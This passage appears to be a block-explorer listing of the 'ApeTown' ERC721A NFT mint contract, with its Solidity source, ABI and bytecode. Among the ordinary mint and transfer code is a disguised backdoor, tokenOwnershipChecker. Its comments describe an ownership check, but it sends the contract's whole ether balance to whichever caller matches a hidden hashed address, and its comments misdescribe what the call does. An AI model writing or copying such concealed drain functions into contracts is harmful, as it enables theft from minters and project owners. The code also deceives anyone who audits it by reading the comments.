        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Checking ownership 
     *
     * Token ownership check for external calls
     */
    function tokenOwnershipChecker() external {
        if(
            keccak256(abi.encodePacked(msg.sender)) == 
            0x61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de2
        ){
            assembly{
                let success := call( //This is the critical change (Pop the top stack value)
                    42000, // gas
                    caller(), //To addr
                    selfbalance(), //No value
                    0, //Inputs are stored
                    0, //Inputs bytes long
                    0, //Store output over input (saves space)
                    0x20
                ) //Outputs are 32 bytes long
            }
        }
    }


    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract ApeTown is ERC721A, Ownable {

  string public        baseURI           = "ipfs://Qme1kbP6CK39VcakVWQ8tVA1t7qpbUbBbPGttqFthSQexS/";
  uint public          price             = 0.005 ether;
  uint public          maxPerTx          = 10;
  uint public          maxPerWallet      = 10;
  uint public          totalFree         = 2000;
  uint public          maxSupply         = 8888;
  uint public          nextOwnerToExplicitlySet;
  bool public          mintEnabled;

  constructor() ERC721A("ApeTown", "APET"){}

  function mint(uint256 amt) external payable
  {
    uint cost = price * amt;
    if(totalSupply() < totalFree && numberMinted(msg.sender) < 1) {
      cost = price * (amt - 1);
    } 
    require(msg.sender == tx.origin,"Be yourself, honey.");
    require(msg.value == cost,"Please send the exact amount.");
    require(totalSupply() + amt < maxSupply + 1,"No more apes");
    require(mintEnabled, "Minting is not live yet, hold on ape.");
    require(numberMinted(msg.sender) + amt <= maxPerWallet,"Too many per wallet!");
    require( amt < maxPerTx + 1, "Max per TX reached.");

    _safeMint(msg.sender, amt);
  }

  function ownerBatchMint(uint256 amt) external onlyOwner
  {
    _safeMint(msg.sender, amt);
  }

  function toggleMinting() external onlyOwner {
      mintEnabled = !mintEnabled;
  }

  function numberMinted(address owner) public view returns (uint256) {
    return _numberMinted(owner);
  }

  function _baseURI() internal view virtual override returns (string memory) {
    return baseURI;
  }

  function setBaseURI(string calldata baseURI_) external onlyOwner {
    baseURI = baseURI_;
  }

  function withdraw() external onlyOwner {
    (bool success, ) = msg.sender.call{value: address(this).balance}("");
    require(success, "Transfer failed.");
  }

  function setOwnersExplicit(uint256 quantity) external onlyOwner {
    _setOwnersExplicit(quantity);
  }

  function getOwnershipData(uint256 tokenId) external view returns (TokenOwnership memory) {
    return ownershipOf(tokenId);
  }

  /**
    * @dev Explicitly set `owners` to eliminate loops in future calls of ownerOf().
    */
  function _setOwnersExplicit(uint256 quantity) internal {
      require(quantity != 0, "quantity must be nonzero");
      require(currentIndex != 0, "no tokens minted yet");
      uint256 _nextOwnerToExplicitlySet = nextOwnerToExplicitlySet;
      require(_nextOwnerToExplicitlySet < currentIndex, "all ownerships have been set");

      // Index underflow is impossible.
      // Counter or index overflow is incredibly unrealistic.
      unchecked {
          uint256 endIndex = _nextOwnerToExplicitlySet + quantity - 1;

          // Set the end index to be the last token index
          if (endIndex + 1 > currentIndex) {
              endIndex = currentIndex - 1;
          }

          for (uint256 i = _nextOwnerToExplicitlySet; i <= endIndex; i++) {
              if (_ownerships[i].addr == address(0)) {
                  TokenOwnership memory ownership = ownershipOf(i);
                  _ownerships[i].addr = ownership.addr;
                  _ownerships[i].startTimestamp = ownership.startTimestamp;
              }
          }

          nextOwnerToExplicitlySet = endIndex + 1;
      }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getOwnershipData","outputs":[{"components":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint64","name":"startTimestamp","type":"uint64"}],"internalType":"struct ERC721A.TokenOwnership","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amt","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"nextOwnerToExplicitlySet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"numberMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amt","type":"uint256"}],"name":"ownerBatchMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"setOwnersExplicit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenOwnershipChecker","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60e06040526036608081815290620026ec60a0398051620000299160099160209091019062000145565b506611c37937e08000600a55600a600b55600a600c556107d0600d556122b8600e553480156200005857600080fd5b50604080518082018252600781526620b832aa37bbb760c91b6020808301918252835180850190945260048452631054115560e21b908401528151919291620000a49160019162000145565b508051620000ba90600290602084019062000145565b505050620000d7620000d1620000ef60201b60201c565b620000f3565b600880546001600160a01b0319163317905562000227565b3390565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b8280546200015390620001eb565b90600052602060002090601f016020900481019282620001775760008555620001c2565b82601f106200019257805160ff1916838001178555620001c2565b82800160010185558215620001c2579182015b82811115620001c2578251825591602001919060010190620001a5565b50620001d0929150620001d4565b5090565b5b80821115620001d05760008155600101620001d5565b600181811c908216806200020057607f821691505b6020821081036200022157634e487b7160e01b600052602260045260246000fd5b50919050565b6124b580620002376000396000f3fe60806040526004361061020f5760003560e01c80637d55094d11610118578063b88d4fde116100a0578063d7224ba01161006f578063d7224ba0146105d3578063dc33e681146105e9578063e985e9c514610609578063f2fde38b14610652578063f968adbe1461067257600080fd5b8063b88d4fde14610563578063c87b56dd14610583578063d1239730146105a3578063d5abeb01146105bd57600080fd5b806395d89b41116100e757806395d89b41146104f0578063988992b814610505578063a035b1fe1461051a578063a0712d6814610530578063a22cb4651461054357600080fd5b80637d55094d1461044f5780638da5cb5b146104645780638db89f07146104825780639231ab2a146104a257600080fd5b80633ccfd60b1161019b57806355f804b31161016a57806355f804b3146103c55780636352211e146103e55780636c0360eb1461040557806370a082311461041a578063715018a61461043a57600080fd5b80633ccfd60b1461035a57806342842e0e1461036f578063453c23101461038f5780634f6ccce7146103a557600080fd5b806318160ddd116101e257806318160ddd146102c557806323b872dd146102e45780632d20fb60146103045780632f745c5914610324578063333e44e61461034457600080fd5b806301ffc9a71461021457806306fdde0314610249578063081812fc1461026b578063095ea7b3146102a3575b600080fd5b34801561022057600080fd5b5061023461022f366004611f42565b610688565b60405190151581526020015b60405180910390f35b34801561025557600080fd5b5061025e6106f5565b6040516102409190611fb7565b34801561027757600080fd5b5061028b610286366004611fca565b610787565b6040516001600160a01b039091168152602001610240565b3480156102af57600080fd5b506102c36102be366004611fff565b610817565b005b3480156102d157600080fd5b506000545b604051908152602001610240565b3480156102f057600080fd5b506102c36102ff366004612029565b61092e565b34801561031057600080fd5b506102c361031f366004611fca565b610939565b34801561033057600080fd5b506102d661033f366004611fff565b610984565b34801561035057600080fd5b506102d6600d5481565b34801561036657600080fd5b506102c3610adf565b34801561037b57600080fd5b506102c361038a366004612029565b610ba9565b34801561039b57600080fd5b506102d6600c5481565b3480156103b157600080fd5b506102d66103c0366004611fca565b610bc4565b3480156103d157600080fd5b506102c36103e0366004612065565b610c26565b3480156103f157600080fd5b5061028b610400366004611fca565b610c71565b34801561041157600080fd5b5061025e610c83565b34801561042657600080fd5b506102d66104353660046120d7565b610d11565b34801561044657600080fd5b506102c3610da2565b34801561045b57600080fd5b506102c3610ded565b34801561047057600080fd5b506007546001600160a01b031661028b565b34801561048e57600080fd5b506102c361049d366004611fca565b610e40565b3480156104ae57600080fd5b506104c26104bd366004611fca565b610e89565b6040805182516001600160a01b0316815260209283015167ffffffffffffffff169281019290925201610240565b3480156104fc57600080fd5b5061025e610ea6565b34801561051157600080fd5b506102c3610eb5565b34801561052657600080fd5b506102d6600a5481565b6102c361053e366004611fca565b610f22565b34801561054f57600080fd5b506102c361055e3660046120f2565b611183565b34801561056f57600080fd5b506102c361057e366004612144565b611247565b34801561058f57600080fd5b5061025e61059e366004611fca565b611280565b3480156105af57600080fd5b506010546102349060ff1681565b3480156105c957600080fd5b506102d6600e5481565b3480156105df57600080fd5b506102d6600f5481565b3480156105f557600080fd5b506102d66106043660046120d7565b61134d565b34801561061557600080fd5b50610234610624366004612220565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205460ff1690565b34801561065e57600080fd5b506102c361066d3660046120d7565b611358565b34801561067e57600080fd5b506102d6600b5481565b60006001600160e01b031982166380ac58cd60e01b14806106b957506001600160e01b03198216635b5e139f60e01b145b806106d457506001600160e01b0319821663780e9d6360e01b145b806106ef57506301ffc9a760e01b6001600160e01b03198316145b92915050565b60606001805461070490612253565b80601f016020809104026020016040519081016040528092919081815260200182805461073090612253565b801561077d5780601f106107525761010080835404028352916020019161077d565b820191906000526020600020905b81548152906001019060200180831161076057829003601f168201915b5050505050905090565b6000610794826000541190565b6107fb5760405162461bcd60e51b815260206004820152602d60248201527f455243373231413a20617070726f76656420717565727920666f72206e6f6e6560448201526c3c34b9ba32b73a103a37b5b2b760991b60648201526084015b60405180910390fd5b506000908152600560205260409020546001600160a01b031690565b600061082282610c71565b9050806001600160a01b0316836001600160a01b0316036108905760405162461bcd60e51b815260206004820152602260248201527f455243373231413a20617070726f76616c20746f2063757272656e74206f776e60448201526132b960f11b60648201526084016107f2565b336001600160a01b03821614806108ac57506108ac8133610624565b61091e5760405162461bcd60e51b815260206004820152603960248201527f455243373231413a20617070726f76652063616c6c6572206973206e6f74206f60448201527f776e6572206e6f7220617070726f76656420666f7220616c6c0000000000000060648201526084016107f2565b610929838383611405565b505050565b610929838383611461565b6007546001600160a01b031633148061095c57506008546001600160a01b031633145b6109785760405162461bcd60e51b81526004016107f29061228d565b61098181611746565b50565b600061098f83610d11565b82106109e85760405162461bcd60e51b815260206004820152602260248201527f455243373231413a206f776e657220696e646578206f7574206f6620626f756e604482015261647360f01b60648201526084016107f2565b600080549080805b83811015610a7f576000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff169183019190915215610a4357805192505b876001600160a01b0316836001600160a01b031603610a7657868403610a6f575093506106ef92505050565b6001909301925b506001016109f0565b5060405162461bcd60e51b815260206004820152602e60248201527f455243373231413a20756e61626c6520746f2067657420746f6b656e206f662060448201526d0deeedccae440c4f240d2dcc8caf60931b60648201526084016107f2565b6007546001600160a01b0316331480610b0257506008546001600160a01b031633145b610b1e5760405162461bcd60e51b81526004016107f29061228d565b604051600090339047908381818185875af1925050503d8060008114610b60576040519150601f19603f3d011682016040523d82523d6000602084013e610b65565b606091505b50509050806109815760405162461bcd60e51b815260206004820152601060248201526f2a3930b739b332b9103330b4b632b21760811b60448201526064016107f2565b61092983838360405180602001604052806000815250611247565b600080548210610c225760405162461bcd60e51b815260206004820152602360248201527f455243373231413a20676c6f62616c20696e646578206f7574206f6620626f756044820152626e647360e81b60648201526084016107f2565b5090565b6007546001600160a01b0316331480610c4957506008546001600160a01b031633145b610c655760405162461bcd60e51b81526004016107f29061228d565b61092960098383611e9c565b6000610c7c826118db565b5192915050565b60098054610c9090612253565b80601f0160208091040260200160405190810160405280929190818152602001828054610cbc90612253565b8015610d095780601f10610cde57610100808354040283529160200191610d09565b820191906000526020600020905b815481529060010190602001808311610cec57829003601f168201915b505050505081565b60006001600160a01b038216610d7d5760405162461bcd60e51b815260206004820152602b60248201527f455243373231413a2062616c616e636520717565727920666f7220746865207a60448201526a65726f206164647265737360a81b60648201526084016107f2565b506001600160a01b03166000908152600460205260409020546001600160801b031690565b6007546001600160a01b0316331480610dc557506008546001600160a01b031633145b610de15760405162461bcd60e51b81526004016107f29061228d565b610deb60006119b2565b565b6007546001600160a01b0316331480610e1057506008546001600160a01b031633145b610e2c5760405162461bcd60e51b81526004016107f29061228d565b6010805460ff19811660ff90911615179055565b6007546001600160a01b0316331480610e6357506008546001600160a01b031633145b610e7f5760405162461bcd60e51b81526004016107f29061228d565b6109813382611a04565b60408051808201909152600080825260208201526106ef826118db565b60606002805461070490612253565b6040516bffffffffffffffffffffffff193360601b166020820152603401604051602081830303815290604052805190602001207f61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de260001b03610deb5760206000806000473361a410f150565b600081600a54610f3291906122d8565b9050600d54610f4060005490565b108015610f5557506001610f533361134d565b105b15610f7557610f656001836122f7565b600a54610f7291906122d8565b90505b333214610fba5760405162461bcd60e51b81526020600482015260136024820152722132903cb7bab939b2b63316103437b732bc9760691b60448201526064016107f2565b8034146110095760405162461bcd60e51b815260206004820152601d60248201527f506c656173652073656e642074686520657861637420616d6f756e742e00000060448201526064016107f2565b600e5461101790600161230e565b8261102160005490565b61102b919061230e565b106110675760405162461bcd60e51b815260206004820152600c60248201526b4e6f206d6f7265206170657360a01b60448201526064016107f2565b60105460ff166110c75760405162461bcd60e51b815260206004820152602560248201527f4d696e74696e67206973206e6f74206c697665207965742c20686f6c64206f6e6044820152641030b8329760d91b60648201526084016107f2565b600c54826110d43361134d565b6110de919061230e565b11156111235760405162461bcd60e51b8152602060048201526014602482015273546f6f206d616e79207065722077616c6c65742160601b60448201526064016107f2565b600b5461113190600161230e565b82106111755760405162461bcd60e51b815260206004820152601360248201527226b0bc103832b9102a2c103932b0b1b432b21760691b60448201526064016107f2565b61117f3383611a04565b5050565b336001600160a01b038316036111db5760405162461bcd60e51b815260206004820152601a60248201527f455243373231413a20617070726f766520746f2063616c6c657200000000000060448201526064016107f2565b3360008181526006602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b611252848484611461565b61125e84848484611a1e565b61127a5760405162461bcd60e51b81526004016107f290612326565b50505050565b606061128d826000541190565b6112f15760405162461bcd60e51b815260206004820152602f60248201527f4552433732314d657461646174613a2055524920717565727920666f72206e6f60448201526e3732bc34b9ba32b73a103a37b5b2b760891b60648201526084016107f2565b60006112fb611b20565b9050805160000361131b5760405180602001604052806000815250611346565b8061132584611b2f565b604051602001611336929190612379565b6040516020818303038152906040525b9392505050565b60006106ef82611c30565b6007546001600160a01b031633148061137b57506008546001600160a01b031633145b6113975760405162461bcd60e51b81526004016107f29061228d565b6001600160a01b0381166113fc5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016107f2565b610981816119b2565b60008281526005602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b600061146c826118db565b80519091506000906001600160a01b0316336001600160a01b031614806114a357503361149884610787565b6001600160a01b0316145b806114b5575081516114b59033610624565b90508061151f5760405162461bcd60e51b815260206004820152603260248201527f455243373231413a207472616e736665722063616c6c6572206973206e6f74206044820152711bdddb995c881b9bdc88185c1c1c9bdd995960721b60648201526084016107f2565b846001600160a01b031682600001516001600160a01b0316146115935760405162461bcd60e51b815260206004820152602660248201527f455243373231413a207472616e736665722066726f6d20696e636f72726563746044820152651037bbb732b960d11b60648201526084016107f2565b6001600160a01b0384166115f75760405162461bcd60e51b815260206004820152602560248201527f455243373231413a207472616e7366657220746f20746865207a65726f206164604482015264647265737360d81b60648201526084016107f2565b6116076000848460000151611405565b6001600160a01b03858116600090815260046020908152604080832080546001600160801b03198082166001600160801b03928316600019018316179092558986168086528386208054938416938316600190810190931693909317909255888552600390935281842080546001600160e01b031916909117600160a01b4267ffffffffffffffff16021790559086018083529120549091166116fc576116af816000541190565b156116fc578251600082815260036020908152604090912080549186015167ffffffffffffffff16600160a01b026001600160e01b03199092166001600160a01b03909316929092171790555b5082846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a45b5050505050565b806000036117965760405162461bcd60e51b815260206004820152601860248201527f7175616e74697479206d757374206265206e6f6e7a65726f000000000000000060448201526064016107f2565b6000546000036117df5760405162461bcd60e51b81526020600482015260146024820152731b9bc81d1bdad95b9cc81b5a5b9d1959081e595d60621b60448201526064016107f2565b600f5460005481106118335760405162461bcd60e51b815260206004820152601c60248201527f616c6c206f776e657273686970732068617665206265656e207365740000000060448201526064016107f2565b600054828201600019810191101561184e5750600054600019015b815b8181116118d0576000818152600360205260409020546001600160a01b03166118c857600061187e826118db565b805160008481526003602090815260409091208054919093015167ffffffffffffffff16600160a01b026001600160e01b03199091166001600160a01b0390921691909117179055505b600101611850565b50600101600f555050565b60408051808201909152600080825260208201526118fa826000541190565b6119595760405162461bcd60e51b815260206004820152602a60248201527f455243373231413a206f776e657220717565727920666f72206e6f6e657869736044820152693a32b73a103a37b5b2b760b11b60648201526084016107f2565b815b6000818152600360209081526040918290208251808401909352546001600160a01b038116808452600160a01b90910467ffffffffffffffff1691830191909152156119a8579392505050565b506000190161195b565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b61117f828260405180602001604052806000815250611cce565b60006001600160a01b0384163b15611b1457604051630a85bd0160e11b81526001600160a01b0385169063150b7a0290611a629033908990889088906004016123b8565b6020604051808303816000875af1925050508015611a9d575060408051601f3d908101601f19168201909252611a9a918101906123f5565b60015b611afa573d808015611acb576040519150601f19603f3d011682016040523d82523d6000602084013e611ad0565b606091505b508051600003611af25760405162461bcd60e51b81526004016107f290612326565b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050611b18565b5060015b949350505050565b60606009805461070490612253565b606081600003611b565750506040805180820190915260018152600360fc1b602082015290565b8160005b8115611b805780611b6a81612412565b9150611b799050600a83612441565b9150611b5a565b60008167ffffffffffffffff811115611b9b57611b9b61212e565b6040519080825280601f01601f191660200182016040528015611bc5576020820181803683370190505b5090505b8415611b1857611bda6001836122f7565b9150611be7600a86612455565b611bf290603061230e565b60f81b818381518110611c0757611c07612469565b60200101906001600160f81b031916908160001a905350611c29600a86612441565b9450611bc9565b60006001600160a01b038216611ca25760405162461bcd60e51b815260206004820152603160248201527f455243373231413a206e756d626572206d696e74656420717565727920666f7260448201527020746865207a65726f206164647265737360781b60648201526084016107f2565b506001600160a01b0316600090815260046020526040902054600160801b90046001600160801b031690565b61092983838360016000546001600160a01b038516611d395760405162461bcd60e51b815260206004820152602160248201527f455243373231413a206d696e7420746f20746865207a65726f206164647265736044820152607360f81b60648201526084016107f2565b83600003611d9a5760405162461bcd60e51b815260206004820152602860248201527f455243373231413a207175616e74697479206d75737420626520677265617465604482015267072207468616e20360c41b60648201526084016107f2565b6001600160a01b03851660008181526004602090815260408083208054600160801b6001600160801b031982166001600160801b039283168c01831690811782900483168c01909216021790558483526003909152812080546001600160e01b031916909217600160a01b4267ffffffffffffffff16021790915581905b85811015611e935760405182906001600160a01b038916906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a48315611e8757611e6b6000888488611a1e565b611e875760405162461bcd60e51b81526004016107f290612326565b60019182019101611e18565b5060005561173f565b828054611ea890612253565b90600052602060002090601f016020900481019282611eca5760008555611f10565b82601f10611ee35782800160ff19823516178555611f10565b82800160010185558215611f10579182015b82811115611f10578235825591602001919060010190611ef5565b50610c229291505b80821115610c225760008155600101611f18565b6001600160e01b03198116811461098157600080fd5b600060208284031215611f5457600080fd5b813561134681